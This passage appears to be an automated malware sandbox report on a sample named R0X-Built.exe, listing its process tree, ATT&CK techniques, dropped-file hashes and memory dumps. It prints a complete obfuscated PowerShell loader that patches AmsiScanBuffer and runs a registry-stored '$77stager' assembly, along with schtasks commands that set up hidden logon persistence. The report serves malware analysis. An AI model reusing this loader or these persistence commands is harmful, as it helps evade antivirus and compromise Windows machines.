PID 4180 wrote to memory of 2844	4180	dllhost.exe	svchost.exe
PID 4180 wrote to memory of 2860	4180	dllhost.exe	svchost.exe

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:612

C:\Windows\system32\dwm.exe
"dwm.exe"
2⤵
PID:380

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{eb3884b1-a335-4067-add0-42691756510a}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4180

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:668

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:964

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:424

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:1032

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1116

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1124

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Drops file in System32 directory
PID:1204

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1236

C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
2⤵
PID:2816

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:rScMdWxtkVnl{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$iHYAfjDyNNTFso,[Parameter(Position=1)][Type]$FArUSIkWiz)$pjLKVsSTQtw=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'f'+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+'e'+''+'d'+''+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+'M'+''+[Char](101)+''+[Char](109)+''+'o'+''+'r'+''+'y'+''+[Char](77)+'o'+'d'+''+'u'+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+'D'+[Char](101)+''+[Char](108)+''+[Char](101)+''+'g'+''+'a'+''+[Char](116)+'e'+[Char](84)+''+[Char](121)+''+'p'+'e',''+'C'+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+','+'P'+''+[Char](117)+''+'b'+'l'+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+'a'+[Char](108)+'e'+[Char](100)+','+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+[Char](67)+''+'l'+''+[Char](97)+''+'s'+''+[Char](115)+''+[Char](44)+''+[Char](65)+'u'+'t'+''+[Char](111)+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$pjLKVsSTQtw.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+''+[Char](112)+''+[Char](101)+'c'+'i'+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+[Char](97)+'m'+[Char](101)+''+[Char](44)+''+'H'+''+'i'+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+'S'+''+[Char](105)+'g'+[Char](44)+''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$iHYAfjDyNNTFso).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+[Char](116)+'i'+'m'+''+[Char](101)+''+','+''+[Char](77)+''+'a'+'n'+'a'+''+[Char](103)+''+[Char](101)+'d');$pjLKVsSTQtw.DefineMethod(''+[Char](73)+''+'n'+''+[Char](118)+''+'o'+''+'k'+''+'e'+'',''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+''+','+''+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+''+'B'+'yS'+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+'o'+'t,'+'V'+''+[Char](105)+'rt'+[Char](117)+''+[Char](97)+'l',$FArUSIkWiz,$iHYAfjDyNNTFso).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+'ti'+[Char](109)+'e,'+'M'+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+'ed');Write-Output $pjLKVsSTQtw.CreateType();}$ZvZPhEmnkEwEw=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+''+[Char](116)+'e'+[Char](109)+''+[Char](46)+''+[Char](100)+''+'l'+''+'l'+'')}).GetType('M'+'i'+''+'c'+''+'r'+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+'t.W'+[Char](105)+''+[Char](110)+''+'3'+'2'+[Char](46)+''+'U'+'n'+[Char](115)+''+'a'+''+[Char](102)+''+'e'+''+'N'+''+[Char](97)+''+[Char](116)+''+'i'+''+[Char](118)+''+[Char](101)+''+'M'+''+[Char](101)+''+[Char](116)+'ho'+'d'+''+'s'+'');$nxFsWxYSjSYVSP=$ZvZPhEmnkEwEw.GetMethod('G'+[Char](101)+''+'t'+'P'+'r'+''+[Char](111)+''+[Char](99)+''+'A'+''+[Char](100)+''+[Char](100)+''+[Char](114)+''+[Char](101)+'s'+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+''+[Char](116)+''+'a'+'t'+'i'+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$lQspCPTxFgfTsITImtt=rScMdWxtkVnl @([String])([IntPtr]);$lSwQCkpIkmqVyvHPOtNTRJ=rScMdWxtkVnl @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$UHSzFBUfbUy=$ZvZPhEmnkEwEw.GetMethod(''+'G'+'e'+[Char](116)+''+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+'e'+'H'+'a'+''+[Char](110)+'dl'+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+[Char](114)+''+[Char](110)+''+[Char](101)+''+'l'+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'')));$HIoECsTgUuZIDP=$nxFsWxYSjSYVSP.Invoke($Null,@([Object]$UHSzFBUfbUy,[Object]('Lo'+[Char](97)+''+'d'+''+[Char](76)+'i'+[Char](98)+''+[Char](114)+''+[Char](97)+''+'r'+'y'+[Char](65)+'')));$cgDPBEFUwLqJFtaiE=$nxFsWxYSjSYVSP.Invoke($Null,@([Object]$UHSzFBUfbUy,[Object](''+[Char](86)+'ir'+[Char](116)+''+[Char](117)+''+'a'+''+'l'+''+'P'+''+[Char](114)+''+[Char](111)+''+'t'+''+[Char](101)+''+'c'+'t')));$wCFKNSa=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($HIoECsTgUuZIDP,$lQspCPTxFgfTsITImtt).Invoke(''+[Char](97)+'m'+'s'+''+[Char](105)+'.'+'d'+''+'l'+''+[Char](108)+'');$AbclqIGILzgalEtNR=$nxFsWxYSjSYVSP.Invoke($Null,@([Object]$wCFKNSa,[Object](''+'A'+''+[Char](109)+'s'+[Char](105)+'S'+'c'+''+[Char](97)+'n'+'B'+'uffe'+[Char](114)+'')));$CquCUIRuGh=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($cgDPBEFUwLqJFtaiE,$lSwQCkpIkmqVyvHPOtNTRJ).Invoke($AbclqIGILzgalEtNR,[uint32]8,4,[ref]$CquCUIRuGh);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$AbclqIGILzgalEtNR,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($cgDPBEFUwLqJFtaiE,$lSwQCkpIkmqVyvHPOtNTRJ).Invoke($AbclqIGILzgalEtNR,[uint32]8,0x20,[ref]$CquCUIRuGh);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+'E').GetValue(''+[Char](36)+''+[Char](55)+'7'+[Char](115)+'ta'+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1312

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1288

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1324

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1344

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1452

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1492

C:\Windows\system32\sihost.exe
sihost.exe
2⤵
PID:2552

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1556

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1580

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1656

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1712

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1732

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1804

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1816

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1932

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1984

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:2004

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1440

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2084

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2100

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2184

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2296

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2516

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2524

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2596

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
PID:2760

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2796

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2828

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2836

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:2844

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2860

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2320

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3480

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3520

C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe
"C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe"
2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3000

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "$srr-mstha" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe" /rl HIGHEST /f
3⤵
- Creates scheduled task(s)
PID:2236

C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe
"C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe"
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4056

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "$srr-mstha" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe" /rl HIGHEST /f
4⤵
- Creates scheduled task(s)
PID:868

C:\Users\Admin\AppData\Local\Temp\install.exe
"C:\Users\Admin\AppData\Local\Temp\install.exe"
3⤵
- Executes dropped EXE
PID:3736

C:\Windows\SysWOW64\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77R0X-Built.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe'" /sc onlogon /rl HIGHEST
3⤵
- Creates scheduled task(s)
PID:4656

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3692

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3892

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4040

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4132

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:4772

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:4524

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:1156

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:2232

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:2900

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
PID:1588

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:4784

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3148

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4680

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3584

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
PID:372

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:1212

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca
1⤵
PID:5004

C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
1⤵
PID:1688

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Scheduled Task/Job

1

T1053

Persistence

Scheduled Task/Job

1

T1053

Privilege Escalation

Scheduled Task/Job

1

T1053

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

1

T1102

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\install.exe
Filesize
162KB

MD5
152e3f07bbaf88fb8b097ba05a60df6e

SHA1
c4638921bb140e7b6a722d7c4d88afa7ed4e55c8

SHA256
a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc

SHA512
2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4

Download Submit
C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe
Filesize
409KB

MD5
2812f62b21fe2118e1259169e015b054

SHA1
e96a2077f063b0c5fc9708f9c1e89283999e4211

SHA256
c2fac5230442f151a25ac8b3765caa659ecfe9e32e4e45e6e8097365a9a14436

SHA512
bf5e18186402fcfd5dcd79bbbbe382ff9754e69098b6477dcef8cb3d69d71d67857fe6caf2362ed14aaf79412afb396a0f829a44335b31b7497ce0f690bb2aa2

Download Submit
C:\Windows\Temp\__PSScriptPolicyTest_lvws3423.cz0.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/380-89-0x00007FFCB9FD0000-0x00007FFCB9FE0000-memory.dmp

Filesize
64KB

Download
memory/380-88-0x0000021C612E0000-0x0000021C6130B000-memory.dmp

Filesize
172KB

Download
memory/380-82-0x0000021C612E0000-0x0000021C6130B000-memory.dmp

Filesize
172KB

Download
memory/424-93-0x0000029C750E0000-0x0000029C7510B000-memory.dmp

Filesize
172KB

Download
memory/612-47-0x0000020E2F7C0000-0x0000020E2F7E5000-memory.dmp

Filesize
148KB

Download
memory/612-56-0x00007FFCB9FD0000-0x00007FFCB9FE0000-memory.dmp

Filesize
64KB

Download
memory/612-49-0x0000020E2F7F0000-0x0000020E2F81B000-memory.dmp

Filesize
172KB

Download
memory/612-48-0x0000020E2F7F0000-0x0000020E2F81B000-memory.dmp

Filesize
172KB

Download
memory/612-55-0x0000020E2F7F0000-0x0000020E2F81B000-memory.dmp

Filesize
172KB

Download
memory/668-67-0x00007FFCB9FD0000-0x00007FFCB9FE0000-memory.dmp

Filesize
64KB

Download
memory/668-66-0x00000171CE8F0000-0x00000171CE91B000-memory.dmp

Filesize
172KB

Download
memory/668-60-0x00000171CE8F0000-0x00000171CE91B000-memory.dmp

Filesize
172KB

Download
memory/964-78-0x00007FFCB9FD0000-0x00007FFCB9FE0000-memory.dmp

Filesize
64KB

Download
memory/964-77-0x0000027C28300000-0x0000027C2832B000-memory.dmp

Filesize
172KB

Download
memory/964-71-0x0000027C28300000-0x0000027C2832B000-memory.dmp

Filesize
172KB

Download
memory/1312-23-0x000002197C850000-0x000002197C872000-memory.dmp

Filesize
136KB

Download
memory/1312-32-0x00007FFCF9F50000-0x00007FFCFA145000-memory.dmp

Filesize
2.0MB

Download
memory/1312-33-0x00007FFCF9970000-0x00007FFCF9A2E000-memory.dmp

Filesize
760KB

Download
memory/1312-31-0x000002197CBC0000-0x000002197CBEA000-memory.dmp

Filesize
168KB

Download
memory/3000-2-0x0000000005B40000-0x00000000060E4000-memory.dmp

Filesize
5.6MB

Download
memory/3000-1-0x0000000000C60000-0x0000000000CCC000-memory.dmp

Filesize
432KB

Download
memory/3000-3-0x0000000005710000-0x00000000057A2000-memory.dmp

Filesize
584KB

Download
memory/3000-4-0x0000000075240000-0x00000000759F0000-memory.dmp

Filesize
7.7MB

Download
memory/3000-7-0x0000000006930000-0x000000000696C000-memory.dmp

Filesize
240KB

Download
memory/3000-20-0x0000000075240000-0x00000000759F0000-memory.dmp

Filesize
7.7MB

Download
memory/3000-5-0x00000000057B0000-0x0000000005816000-memory.dmp

Filesize
408KB

Download
memory/3000-0-0x000000007524E000-0x000000007524F000-memory.dmp

Filesize
4KB

Download
memory/3000-6-0x00000000063F0000-0x0000000006402000-memory.dmp

Filesize
72KB

Download
memory/4056-14-0x0000000075240000-0x00000000759F0000-memory.dmp

Filesize
7.7MB

Download
memory/4056-13-0x0000000075240000-0x00000000759F0000-memory.dmp

Filesize
7.7MB

Download
memory/4180-44-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/4180-42-0x00007FFCF9F50000-0x00007FFCFA145000-memory.dmp

Filesize
2.0MB

Download
memory/4180-43-0x00007FFCF9970000-0x00007FFCF9A2E000-memory.dmp

Filesize
760KB

Download
memory/4180-41-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/4180-34-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/4180-35-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/4180-36-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/4180-37-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads